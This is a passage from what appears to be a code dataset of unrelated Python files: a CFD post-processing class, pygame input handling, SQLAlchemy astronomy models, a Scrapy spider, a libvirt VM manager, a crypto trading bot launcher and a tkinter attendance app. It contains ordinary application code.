cms.EndPath(process.out)\n","sub_path":"scratch/process_for_crab_cfg.py","file_name":"process_for_crab_cfg.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"473510415","text":"# -*- coding: utf-8 -*-\n\nfrom pyfr.readers.native import read_pyfr_data\nfrom pyfr.inifile import Inifile\n\n\nclass BaseWriter(object):\n \"\"\"Functionality for post-processing PyFR data to visualisation formats\"\"\"\n\n def __init__(self, args):\n \"\"\"Loads PyFR mesh and solution files\n\n A check is made to ensure the solution was computed on the mesh.\n\n :param args: Command line arguments passed from scripts/postp.py\n :type args: class 'argparse.Namespace'\n\n \"\"\"\n self.args = args\n self.outf = args.outf\n\n # Load mesh and solution files\n self.soln = read_pyfr_data(args.solnf)\n self.mesh = read_pyfr_data(args.meshf)\n\n # Get element types and array shapes\n self.mesh_inf = self.mesh.array_info\n self.soln_inf = self.soln.array_info\n\n # Check solution and mesh are compatible\n if self.mesh['mesh_uuid'] != self.soln['mesh_uuid']:\n raise RuntimeError('Solution \"%s\" was not computed on mesh \"%s\"' %\n (args.solnf, args.meshf))\n\n # Load config file\n self.cfg = Inifile(self.soln['config'])\n","sub_path":"pyfr/writers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"558165557","text":"# def reverse(text):\n# return text[::-1]\n#\n#\n# def is_palindrome(text):\n# return text == reverse(text)\n#\n#\n# something = input('Enter text: ')\n# print(is_palindrome(something))\n\n\n# poem = '''\n# line 1\n# line 2\n#\n# Line 3'''\n#\n# f = open('poem.txt', 'w')\n# f.write(poem)\n# f.close()\n#\n# f = open('poem.txt', 'r')\n# while True:\n# line = f.readline()\n# if len(line) == 0:\n# break\n# else:\n# print(line, end='')\n# f.close()\n\n\n# import pickle\n#\n#\n# shoplistfile = 'shoplist.data'\n# shoplist = ['apple', 'mango', 'carrot']\n#\n# f = open(shoplistfile, 'wb')\n# pickle.dump(shoplist, f)\n# f.close()\n#\n# del shoplist\n#\n# f = open(shoplistfile, 'rb')\n# storedlist = pickle.load(f)\n# print(storedlist)\n\n\nimport io\n\nf = io.open(\"abc.txt\", \"w\", encoding='utf-8')\nf.write(\"超级没办法\")\nf.close()\n\nwith io.open(\"abc.txt\") as text:\n print(text)","sub_path":"byte-of-python/04_io.py","file_name":"04_io.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"301373733","text":"\"\"\"Input Handler for the game Dimensional Maze.\n\nThis module handles takes in all user input for and translates it into actions\nin the Dimensional Maze game.\n\"\"\"\nimport logging\nimport pygame\nfrom enum import Enum\n\n#Module level logger. Outputs debug info to external file.\nlogging.basicConfig(filename='log.txt', filemode='w', level=logging.DEBUG)\nlogger = logging.getLogger('input_handler')\n\n\ndef handle_key_event(keys):\n \"\"\"Take in an array of currently pressed down keys and return a game\n action.\n\n An array of currently pressed down keys is turned into a game action. That\n action is a tuple containing an Input_Type enum value describing the type\n of action, the dimensions involved in the action and the direction the\n action is going.\n \n Keyword arguments:\n keys -- An array representing the keys which are currently pressed down.\n This array is navigatable using the pygame module.\n \"\"\"\n #If Escape key has been pressed, return the EXIT Input_Type.\n if keys[pygame.K_ESCAPE]:\n logger.debug(\"Escape\")\n return (Input_Type.EXIT, -1, 0)\n\n #This loop handles commands for movement in any numbered dimension up to\n #nine. If any of the keys 1-9 is pressed at the same time as the Up or Down\n #key, then a this returns the MOVE_4D Input_Type as well as the numbered\n #dimension (from the numbered key pressed minus one) and direction (Up = 1,\n #Down = -1). The numbering of the dimensions is absolute based on the\n #maze's perspective.\n for direction in range(0, 2):\n for dimension in range(0, 9):\n if (keys[pygame.K_1 + dimension] and \n keys[pygame.K_UP + direction]):\n log = ' '.join(\n [\"MOVE_4D\", str(dimension), str(-2 * direction + 1)])\n logger.debug(log)\n return (Input_Type.MOVE_4D, dimension, -2 * direction + 1)\n\n #This loop handles commands for rotation between the first dimension and\n #any other numbered dimension up to nine. If any of the keys 2-9 is pressed\n #at the same time as the W or S key, then a this returns the ROTATE_4D\n #Input_Type as well as the numbered dimensions involved in the rotation (0\n #and the numbered key pressed minus one) and direction (W = 1, S = -1). The\n #numbering of the dimensions is absolute based on the maze's perspective.\n #The numbering of the dimensions is relative based on the player's\n #orientation, meaning the first dimension is always facing forward.\n for direction in range(0, 2):\n for dimension in range(1, 9):\n if (keys[pygame.K_1 + dimension] and\n keys[pygame.K_w - 4 * direction]):\n log = ' '.join(\n [\"ROTATE_4D\", str(dimension), str(-2 * direction + 1)])\n logger.debug(log)\n return (Input_Type.ROTATE_4D, dimension, -2 * direction + 1)\n\n #This if-else statement handles all commands for movement and rotation\n #within the first three dimensions based on the player's orientation. The\n #keys Up, Down, Right, Left, Z and X move the player forwards, backwards,\n #right, left, up and down in 3D space respectively, while the keys D, A, W,\n #S, Q and E turn the player right, left, up, down, anti-clockwise and\n #clock-wise in 3D space respectively. 
The MOVE_3D or ROTATE_3D Input_Type\n #is returned along with the dimension/s involved and the direction.\n if (keys[pygame.K_UP]):\n logger.debug(\"UP\")\n return (Input_Type.MOVE_3D, 0, 1)\n elif (keys[pygame.K_DOWN]):\n logger.debug(\"DOWN\")\n return (Input_Type.MOVE_3D, 0, -1)\n elif keys[pygame.K_RIGHT]:\n logger.debug(\"RIGHT\")\n return (Input_Type.MOVE_3D, 1, 1)\n elif keys[pygame.K_LEFT]:\n logger.debug(\"LEFT\")\n return (Input_Type.MOVE_3D, 1, -1)\n elif keys[pygame.K_z]:\n logger.debug(\"Z\")\n return (Input_Type.MOVE_3D, 2, 1)\n elif keys[pygame.K_x]:\n logger.debug(\"X\")\n return (Input_Type.MOVE_3D, 2, -1)\n elif keys[pygame.K_d]:\n logger.debug(\"D\")\n return (Input_Type.ROTATE_3D, [0, 1], 1)\n elif keys[pygame.K_a]:\n logger.debug(\"A\")\n return (Input_Type.ROTATE_3D, [0, 1], -1)\n elif keys[pygame.K_w]:\n logger.debug(\"W\")\n return (Input_Type.ROTATE_3D, [0, 2], 1)\n elif keys[pygame.K_s]:\n logger.debug(\"S\")\n return (Input_Type.ROTATE_3D, [0, 2], -1)\n elif keys[pygame.K_q]:\n logger.debug(\"Q\")\n return (Input_Type.ROTATE_3D, [1, 2], 1)\n elif keys[pygame.K_e]:\n logger.debug(\"E\")\n return (Input_Type.ROTATE_3D, [1, 2], -1)\n else:\n #If no combination of keys was recognised then it is an invalid\n #command and the INVALID_MOVE Input_Type is returned.\n logger.debug(' '.join([\"Invalid\", ' '.join(str(key) for key in keys)]))\n return (Input_Type.INVALID_MOVE, -1, -1)\n\n\nclass Input_Type(Enum):\n \"\"\"An enumerated class for the types of input received from the player\n\n INVALID_MOVE For use when an input is not recognised.\n EXIT For use when an 'exit or quit game' command is recognised.\n MOVE_3D For use when a command to move within the first three\n dimensions is recognised.\n ROTATE_3D For use when a command to rotate within the first three\n dimensions is recognised.\n MOVE_4D For use when a command to move through any dimension is\n recognised.\n ROTATE_4D For use when a command to rotate through any dimension is\n recognised.\n \"\"\"\n INVALID_MOVE = -1\n EXIT = 0\n MOVE_3D = 1\n ROTATE_3D = 2\n MOVE_4D = 3\n ROTATE_4D = 4","sub_path":"input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
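The `-2 * direction + 1` expression used throughout `handle_key_event` maps the loop index 0/1 onto the game directions +1/-1; a quick standalone check:

```python
# direction index 0 (e.g. Up/W) -> +1, index 1 (e.g. Down/S) -> -1
for direction in range(0, 2):
    print(direction, -2 * direction + 1)
# prints: 0 1
#         1 -1
```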
+{"seq_id":"269751144","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nModelClasses.py\n\nCreated by José Sánchez-Gallego on 23 Jul 2015.\nLicensed under a 3-clause BSD license.\n\nRevision history:\n 23 Jul 2015 J. Sánchez-Gallego\n Initial version\n 21 Feb 2016 J. Sánchez-Gallego\n Rewritten as classes derived from declarative base.\n\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom sdss.internal.database.DatabaseConnection import DatabaseConnection\nfrom sqlalchemy.orm import relationship, configure_mappers, backref\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy import case\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom sqlalchemy import ForeignKeyConstraint, func\nimport shutil\nimport re\nimport math\nimport itertools\n\ntry:\n import cStringIO as StringIO\nexcept ImportError:\n from io import StringIO\n\ndb = DatabaseConnection()\nBase = db.Base\n\n\ndef cameliseClassname(tableName):\n \"\"\"Produce a camelised class name.\"\"\"\n\n return str(tableName[0].upper() +\n re.sub(r'_([a-z])',\n lambda m: m.group(1).upper(), tableName[1:]))\n\n\ndef ClassFactory(name, tableName, BaseClass=db.Base, fks=None):\n tableArgs = [{'autoload': True, 'schema': 'mangasampledb'}]\n if fks:\n for fk in fks:\n tableArgs.insert(0, ForeignKeyConstraint([fk[0]], [fk[1]]))\n\n newclass = type(\n name, (BaseClass,),\n {'__tablename__': tableName,\n '__table_args__': tuple(tableArgs)})\n\n return newclass\n\n\nclass MangaTarget(Base):\n __tablename__ = 'manga_target'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk,\n self.mangaid)\n\n\nclass Anime(Base):\n __tablename__ = 'anime'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk, self.anime)\n\n\nclass Character(Base):\n __tablename__ = 'character'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n target = relationship(MangaTarget, backref='character', uselist=False)\n anime = relationship(Anime, backref='characters')\n\n def __repr__(self):\n return ''.format(self.pk, self.name)\n\n def savePicture(self, path):\n \"\"\"Saves the picture blob to disk.\"\"\"\n\n buf = StringIO(self.picture)\n with open(path, 'w') as fd:\n buf.seek(0)\n shutil.copyfileobj(buf, fd)\n\n return buf\n\n\nclass Catalogue(Base):\n __tablename__ = 'catalogue'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n @property\n def isCurrent(self):\n return self.currentCatalogue is not None\n\n def __repr__(self):\n return (''\n .format(self.pk, self.catalogue_name, self.version,\n self.isCurrent))\n\n\nclass CurrentCatalogue(Base):\n __tablename__ = 'current_catalogue'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n catalogue = relationship(\n 'Catalogue', backref=backref('currentCatalogue', uselist=False))\n\n def __repr__(self):\n return ''.format(self.pk)\n\n\nclass MangaTargetToMangaTarget(Base):\n __tablename__ = 'manga_target_to_manga_target'\n __table_args__ = {'autoload': True, 'schema': 'mangasampledb'}\n\n def __repr__(self):\n return ''.format(self.pk)\n\n\nclass NSA(Base):\n __tablename__ = 'nsa'\n __table_args__ = (\n ForeignKeyConstraint(['catalogue_pk'], ['mangasampledb.catalogue.pk']),\n {'autoload': True, 'schema': 'mangasampledb'})\n\n def __repr__(self):\n return ''.format(self.pk, self.nsaid)\n\n\nclass MangaTargetToNSA(Base):\n __tablename__ = 'manga_target_to_nsa'\n __table_args__ = (\n 
ForeignKeyConstraint(['manga_target_pk'],\n ['mangasampledb.manga_target.pk']),\n ForeignKeyConstraint(['nsa_pk'], ['mangasampledb.nsa.pk']),\n {'autoload': True, 'schema': 'mangasampledb'})\n\n def __repr__(self):\n return ''.format(self.pk)\n\n# Relationship between NSA and MangaTarget\nNSA.mangaTargets = relationship(\n MangaTarget, backref='NSA_objects', secondary=MangaTargetToNSA.__table__)\n\n# Now we create the remaining tables.\ninsp = inspect(db.engine)\nschemaName = 'mangasampledb'\nallTables = insp.get_table_names(schema=schemaName)\n\ndone_names = db.Base.metadata.tables.keys()\nfor tableName in allTables:\n if schemaName + '.' + tableName in done_names:\n continue\n className = str(tableName).upper()\n\n newClass = ClassFactory(\n className, tableName,\n fks=[('catalogue_pk', 'mangasampledb.catalogue.pk')])\n newClass.catalogue = relationship(\n Catalogue, backref='{0}_objects'.format(tableName))\n locals()[className] = newClass\n done_names.append(schemaName + '.' + tableName)\n\n if 'manga_target_to_' + tableName in allTables:\n relationalTableName = 'manga_target_to_' + tableName\n relationalClassName = 'MangaTargetTo' + tableName.upper()\n newRelationalClass = ClassFactory(\n relationalClassName, relationalTableName,\n fks=[('manga_target_pk', 'mangasampledb.manga_target.pk'),\n ('nsa_pk', 'mangasampledb.nsa.pk')])\n\n locals()[relationalClassName] = newRelationalClass\n done_names.append(schemaName + '.' + relationalTableName)\n\n newClass.mangaTargets = relationship(\n MangaTarget, backref='{0}_objects'.format(tableName),\n secondary=newRelationalClass.__table__)\n\n\ndef HybridProperty(parameter, index=None):\n\n @hybrid_property\n def hybridProperty(self):\n if index is not None:\n return getattr(self, parameter)[index]\n else:\n return getattr(self, parameter)\n\n @hybridProperty.expression\n def hybridProperty(cls):\n if index is not None:\n # It needs to be index + 1 because Postgresql arrays are 1-indexed.\n return getattr(cls, parameter)[index + 1]\n else:\n return getattr(cls, parameter)\n\n return hybridProperty\n\n\ndef HybridColour(parameter):\n\n @hybrid_method\n def colour(self, bandA, bandB):\n\n for band in [bandA, bandB]:\n columnName = parameter + '_' + band\n assert hasattr(self, columnName), \\\n 'cannot find column {0}'.format(columnName)\n\n bandA_param = getattr(self, parameter + '_' + bandA)\n bandB_param = getattr(self, parameter + '_' + bandB)\n\n return bandA_param - bandB_param\n\n @colour.expression\n def colour(cls, bandA, bandB):\n\n for band in [bandA, bandB]:\n columnName = parameter + '_' + band\n assert hasattr(cls, columnName), \\\n 'cannot find column {0}'.format(columnName)\n\n bandA_param = getattr(cls, parameter + '_' + bandA)\n bandB_param = getattr(cls, parameter + '_' + bandB)\n\n return bandA_param - bandB_param\n\n return colour\n\n\ndef HybridMethodToProperty(method, bandA, bandB):\n\n @hybrid_property\n def colour_property(self):\n return getattr(self, method)(bandA, bandB)\n\n return colour_property\n\n\n# Adds hybrid properties defining colours for petroth50_el (for now).\nsetattr(NSA, 'petroth50_el_colour', HybridColour('petroth50_el'))\nfor ii, band in enumerate('FNurgiz'):\n propertyName = 'petroth50_el_{0}'.format(band)\n setattr(NSA, propertyName, HybridProperty('petroth50_el', ii))\n\n# Creates an attribute for each colour.\nfor colour_a, colour_b in itertools.combinations('FNugriz', 2):\n setattr(NSA, 'petroth50_el_{0}_{1}'.format(colour_a, colour_b),\n HybridMethodToProperty('petroth50_el_colour', colour_a, 
colour_b))\n\n\n# Add stellar mass hybrid attributes to NSA catalog\ndef logmass(parameter):\n\n @hybrid_property\n def mass(self):\n par = getattr(self, parameter)\n return math.log10(par) if par > 0. else 0.\n\n @mass.expression\n def mass(cls):\n par = getattr(cls, parameter)\n return case(\n [\n (par > 0., func.log(par)),\n (par == 0., 0.)\n ]\n )\n\n return mass\n\nsetattr(NSA, 'petro_logmass_el', logmass('petro_mass_el'))\nsetattr(NSA, 'sersic_logmass', logmass('sersic_mass'))\n\nconfigure_mappers()\n","sub_path":"python/mangaSampleDB/ModelClasses.py","file_name":"ModelClasses.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
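The instance-level branch of the `logmass` hybrid property above reduces to a guarded log10; standalone, with invented sample masses:

```python
import math

def logmass(value):
    # Same guard as the hybrid property: log10 for positive masses, else 0.
    return math.log10(value) if value > 0.0 else 0.0

print(logmass(1e10))  # 10.0
print(logmass(0.0))   # 0.0
```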
+{"seq_id":"306818270","text":"import random\nimport string\nimport os\n\nsize = 5\nmin_size = 3\naaaaaa = 100\n\ndef saveCode(code):\n global size\n i = 0\n while True:\n name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))\n \n if not os.path.exists(\"codes/s{}/{}.txt\".format(str(size) , name)):\n\n # Создадим директорию если нет\n if not os.path.exists( \"codes/s{}\".format(str(size)) ):\n os.makedirs(\"codes/s{}\".format(str(size)))\n\n # Создаем файл\n f = open(\"codes/s{}/{}.txt\".format(str(size) , name) , \"w\" ,encoding=\"utf-8\")\n f.write(code)\n f.close()\n size -= 1\n if size < min_size:\n size = min_size\n return name\n\n if i == aaaaaa:\n size += 1\n i = 0\n\n i += 1\n\ndef loadCode(id):\n id = str(id)\n\n size = len(id)\n try:\n with open(\"codes/s{}/{}.txt\".format( str(size) , id ) , \"r\" , encoding=\"utf-8\") as f:\n code = f.read()\n f.close()\n return code\n except:\n return False\n\nif __name__ == \"__main__\":\n for i in range():\n print(saveCode())","sub_path":"codemy-master/app/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"120079249","text":"import logging\nimport os\n\nimport ccxt\nimport yaml\n\nfrom tradeexecutor import CryptoExchange, TradeExecutor\nfrom telegram_bot import TelegramBot\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.INFO\n )\n c_dir = os.path.dirname(__file__)\n with open(os.path.join(c_dir, \"..\", \"secret_key.yml\")) as f:\n file_data = yaml.safe_load(f)\n\n ccxt_ex = ccxt.bitfinex()\n ccxt_ex.apiKey = file_data['api_key']\n ccxt_ex.secret = file_data['secret']\n\n exchange = CryptoExchange(ccxt_ex)\n trade_executor = TradeExecutor(exchange)\n telegram_bot = TelegramBot(\n file_data['telegram_ktn'],\n file_data['user_id'],\n trade_executor\n )\n\n telegram_bot.start_bot()","sub_path":"scr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"225785806","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom scrapy.http import Request\nfrom scrapy.spider import Spider\nfrom scrapy.selector import Selector\n\nfrom POPOF_crawler.items import PopofItem\n\nclass NorthSpider(Spider):\n\n name = \"north\"\n code = \"N\"\n domain = \"http://www.fnpn.gov.tw\"\n\n start_urls = [\n \"http://www.fnpn.gov.tw/ct/CFT.php?page=CFTMain&area=N000\",\n\n ]\n def __init__(self,*args, **kwargs):\n super(NorthSpider, self).__init__(*args, **kwargs)\n\n pass\n\n def parse(self, response):\n sel = Selector(response)\n\n urls = sel.xpath(\"//td[@class='table-border-yellow']/a/@href\").extract()\n\n for url in urls:\n target_url = self.domain + url\n yield Request(url=target_url,callback=self.parse_items)\n\n def parse_items(self, response):\n\n def extract_div_data(td):\n return td.xpath(\"div/text()\").extract()[0].encode('utf-8')\n\n def extract_span_data(td):\n return td.xpath(\"span/text()\").extract()[0].encode('utf-8')\n\n def extract_div_span_data(td):\n return td.xpath(\"div/span/text()\").extract()[0].encode('utf-8')\n\n def generate_id(year, batch_no, serial_no):\n return self.code + year.zfill(3) + batch_no.zfill(2) + serial_no.decode('utf-8').replace(u'\\xa0','').zfill(2)\n\n\n sel = Selector(response)\n\n # catch the case_title (include year, batch_no)\n case_title = sel.xpath(\"//div[@class='12-oran-warning']/text()\").extract()[0]\n year, batch_no = re.findall(u\".*[分署|辦事處](\\d+)年.*第(\\d+)批.*\", case_title)[0]\n\n # catch all tr tag of this table\n tr_list = sel.xpath(\"//table[@class='table-border-yellow']/tr\")\n\n tr_list_len = len(tr_list)\n\n items = []\n\n for index in range(1, tr_list_len):\n item = PopofItem()\n\n tds = tr_list[index].xpath('td')\n\n td_count = len(tds)\n\n # need to pass some fiels if it's rowspan\n if td_count == 3:\n item['addr'] = extract_div_data(tds[0])\n item['area'] = extract_div_data(tds[1])\n item['category'] = extract_span_data(tds[2])\n\n prev_item = items[-1]\n\n item['id'] = prev_item['id']\n item['security_deposits'] = prev_item['security_deposits']\n item['notes'] = prev_item['notes']\n item['stop'] = prev_item['stop']\n else:\n item['id'] = generate_id(year, batch_no ,extract_div_span_data(tds[0]))\n item['addr'] = extract_div_data(tds[1])\n item['area'] = extract_div_data(tds[2])\n item['category'] = extract_span_data(tds[3])\n item['price'] = extract_span_data(tds[4])\n item['security_deposits'] = extract_span_data(tds[5])\n item['notes'] = extract_span_data(tds[7])\n item['stop'] = extract_div_span_data(tds[8])\n\n items.append(item)\n pass\n\n return items\n pass\n","sub_path":"POPOF_crawler/spiders/north_spiders.py","file_name":"north_spiders.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"632433390","text":"#! /usr/bin/env python\n# coding:utf8\n\nimport os\nimport libvirt\n\n\nclass VM(object):\n def __init__(self,hostip=None):\n self.conn = None\n self.hostip = hostip\n self.port = 16509\n #self.vms = vms\n #assert isinstance(self.vms,type([])), \"Type error,vms ask LIST type\"\n self.VIRT_STATE_NAME_MAP = {\n libvirt.VIR_DOMAIN_NOSTATE: 'Nostat',\n libvirt.VIR_DOMAIN_RUNNING: 'running',\n libvirt.VIR_DOMAIN_BLOCKED: 'blocking',\n libvirt.VIR_DOMAIN_PAUSED: 'paused',\n libvirt.VIR_DOMAIN_SHUTDOWN: 'shuting',\n libvirt.VIR_DOMAIN_SHUTOFF: 'shutoff',\n libvirt.VIR_DOMAIN_CRASHED: 'crashed' }\n self.connect()\n\n def set_timeout(self,ip):\n \"\"\"\n test the connected by tcp port 16509\n \"\"\"\n import socket\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.settimeout(5)\n try:\n s.connect((ip,self.port))\n s.shutdown(2)\n except Exception as e:\n raise Exception(\"con't connect to %s by tcp,reason:%s\" % (ip,str(e)))\n\n\n def connect(self):\n \"\"\"\n get hypervisor via tcp\n \"\"\"\n\n self.set_timeout(self.hostip)\n self.conn = libvirt.open(\"qemu+tcp://%s/system\" % self.hostip)\n\n def list_all_vms(self):\n \"\"\"\n get all vms name on this hypervisor\n \"\"\"\n vms = []\n vms.extend(self.list_active_vms())\n vms.extend(self.list_inactive_vms())\n return vms\n\n\n def list_active_vms(self):\n \"\"\"\n only get active vms on this hypervisor\n \"\"\"\n vms = []\n dom_ids = self.conn.listDomainsID()\n for id_ in dom_ids:\n vms.append(self.conn.lookupByID(id_).name())\n return vms\n\n\n def list_inactive_vms(self):\n \"\"\"\n only get inactive vms on this hypervisor\n\n \"\"\"\n return self.conn.listDefinedDomains()\n\n\n def get_dom(self, vm_name):\n \"\"\"\n get the object by vm's name\n if the name not defined then return None\n \"\"\"\n if vm_name not in self.list_all_vms():\n return None\n return self.conn.lookupByName(vm_name)\n\n def get_vm_state(self,vm_name):\n \"\"\"\n get the vm's state\n \"\"\"\n dom = self.get_dom(vm_name)\n if dom:\n raw = dom.info()\n return self.VIRT_STATE_NAME_MAP.get(raw[0],'unknown')\n else:\n return \"unknown\"\n\n def close_conn(self):\n \"\"\"\n disconnect the conn\n \"\"\"\n try:\n self.conn.close()\n except:\n pass\n\n def shutdown_force(self, vm_name):\n \"\"\"\n force to shutdown vm via dom.destroy() like pulling the power.\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.destroy()\n\n def shutdown(self, vm_name):\n \"\"\"\n shutdown vm via dom.sutdown()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.shutdown()\n\n def start(self, vm_name):\n \"\"\"\n start vm via dom.create()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.create()\n\n def reboot(self, vm_name):\n \"\"\"\n reboot vm via dom.reboot()\n \"\"\"\n dom = self.get_dom(vm_name)\n dom.reboot()\n\n \n\n\n","sub_path":"apps/virtual_source/views/operatevm.py","file_name":"operatevm.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"411409060","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\n\nimport configparser\nimport argparse\nimport sys\nimport os\n\n'''\nA program feladata: configparser modul demója, próbája, tesztje.\nKaphat paramétert futtatáskor: -c|--config amivel meg lehet adni a konfig fájl nevét,\namennyiben az eltér a \"programfájl neve.ini\"-től.\n(default név az ini_file_name = os.path... kezdetű sorban, a .splitext leválasztja a kiterjesztést\na teljes névből)\nAz add_argument metódus type paraméterében megadott FileType hatására a parser megnyitja a \nfájlt ('r' = read only)\nA ConfigParser osztály read_file() metódusa ezt a nyitott fájlt kapja paraméterként és beolvassa\nbelőle a paramétereket.\nA ConfigParser.sections() adja vissza a \"[valami név]\" formában megadott szakaszok neveit,\na .items(...) a paraméterben megadott szakasz elemeit/értékeit. Egyesével a get...() metódusokkal\nlehet lekérni ugyanezeket.\n\n'''\n\n\ndef teszt():\n arg_parser = argparse.ArgumentParser()\n ini_file_name = os.path.splitext(sys.argv[0])[0] + \".ini\"\n arg_parser.add_argument('-c', '--config', default=ini_file_name, dest='config',\n type=argparse.FileType('r'),\n help='Config file (.ini)', nargs=1)\n parsed_args = arg_parser.parse_args()\n print(parsed_args)\n\n conf_parser = configparser.ConfigParser()\n conf_parser.read_file(parsed_args.config)\n\n for i in conf_parser.sections():\n print(\"{} : {}\".format(i, conf_parser.items(i)))\n\n print(conf_parser.getboolean('router', 'debug'))\n\n\nif __name__ == \"__main__\":\n teszt()\n","sub_path":"probak/ini_parse.py","file_name":"ini_parse.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"40275895","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk\nimport dangnhap\nimport socket\nimport sinhvien\nimport diemdanh\nimport thongke\nfrom backend.dl_giangvien import tengv_email,makhoa_email,sdt_email,magv_ten,update_sdt\nfrom backend.dl_khoa import tenkhoa\nfrom backend.dl_tkb import kt_lichgiang_gv,gv_dd\nimport doimatkhau\nimport taikhoan_thongbao\nimport datetime\n\n\ndef main():\n def dinh_dang_ngay(ngay):\n ngay=str(ngay).replace(\"/\",\" \")\n ngay=str(ngay).replace(\"-\",\" \")\n d=ngay.split()\n if len(d[0])==1:\n d[0]=\"0\"+d[0]\n if len(d[1])==1:\n d[1]=\"0\"+d[1]\n if len(d[2]) ==4 :\n ngay=d[0]+\"/\"+d[1]+\"/\"+d[2]\n else:\n ngay=d[1]+\"/\"+d[0]+\"/20\"+d[2]\n return ngay\n\n def capnhat_sdt():\n if len(sdt.get()) <10 or sdt.get().isnumeric()== False:\n messagebox.showwarning(\"thông báo\",\"Số điện thoại không đúng\")\n elif update_sdt(magv,sdt.get()):\n messagebox.showinfo(\"thông báo\",\"Đã cập nhật số điện thoại\")\n else:\n messagebox.showwarning(\"Lỗi \",\"Cập nhật không thành công\")\n def thongbaodd():\n return\n # win.destroy()\n # diemdanhbu.main()\n def thietlap():\n return\n def chuyentrang_lichgiang():\n win.destroy()\n taikhoan_thongbao.main(lichgiang)\n\n def btndoimatkhau():\n win.destroy()\n doimatkhau.main()\n def menuthongke():\n win.destroy()\n thongke.main()\n\n def menudiemdanh():\n win.destroy()\n diemdanh.main()\n\n def menuthemsv():\n win.destroy()\n sinhvien.main()\n\n def dangxuat():\n ten_thiet_bi = socket.gethostname()\n file=open(ten_thiet_bi+\".txt\",\"w\")\n file.write(\"\")\n file.close()\n win.destroy()\n dangnhap.main()\n\n win=Tk()\n win.geometry(\"1000x600+300+120\")\n win.resizable(False,False)\n win.config(bg=\"green\")\n win.title(\"Menu tkinter\")\n img_bg=ImageTk.PhotoImage(file=\"img/bgtaikhoan.png\")\n img_bg1=ImageTk.PhotoImage(file=\"img/bgtaikhoan1.png\")\n ing_menuthem=ImageTk.PhotoImage(file=\"img/menuthemdl1.png\")\n ing_menudiemdanh=ImageTk.PhotoImage(file=\"img/menudiemdanh.png\")\n ing_menutaikhoan=ImageTk.PhotoImage(file=\"img/menutaikhoan1.png\")\n ing_menuthongke=ImageTk.PhotoImage(file=\"img/menuthongke.png\")\n ing_btndangxuat=ImageTk.PhotoImage(file=\"img/btndangxuat.png\")\n ing_btndangxuat1=ImageTk.PhotoImage(file=\"img/btndangxuat1.png\")\n ing_btndoimatkhau=ImageTk.PhotoImage(file=\"img/btndoimatkhau.png\")\n ing_btnthongbao=ImageTk.PhotoImage(file=\"img/btnthongbao.png\")\n ing_btnthietlap=ImageTk.PhotoImage(file=\"img/thietlap.png\")\n ing_btnquaylai=ImageTk.PhotoImage(file=\"img/btnquaylai.png\")\n ing_capnhatsdt=ImageTk.PhotoImage(file=\"img/capnhatsdt.png\")\n#------------------------------------------------------------------------------\n ten_thiet_bi = socket.gethostname()\n d=[]\n with open(ten_thiet_bi+\".txt\",\"r\") as file:\n d=file.read().split()\n email=d[0]\n makhoa=makhoa_email(email)\n tengv=tengv_email(email)\n magv=magv_ten(tengv)\n tenkh=tenkhoa(makhoa)\n sdt=StringVar()\n sdt.set(sdt_email(email))\n time = datetime.datetime.now()\n now = time.strftime(\"%x\")\n ngay=dinh_dang_ngay(now)\n lichgiang=kt_lichgiang_gv(magv,ngay)\n gvdd=gv_dd(magv,ngay)\n#-------------------------------------------------------------------------------\n bg=Canvas(win,width=1000,height=600,bg=\"green\")\n bg.pack(side=\"left\",padx=0)\n anhnen=bg.create_image(500,300,image=img_bg)\n\n menuthem=Button(bg,image=ing_menuthem,bd=0,highlightthickness=0,command=menuthemsv)\n menuthem.place(x=46,y=129)\n\n 
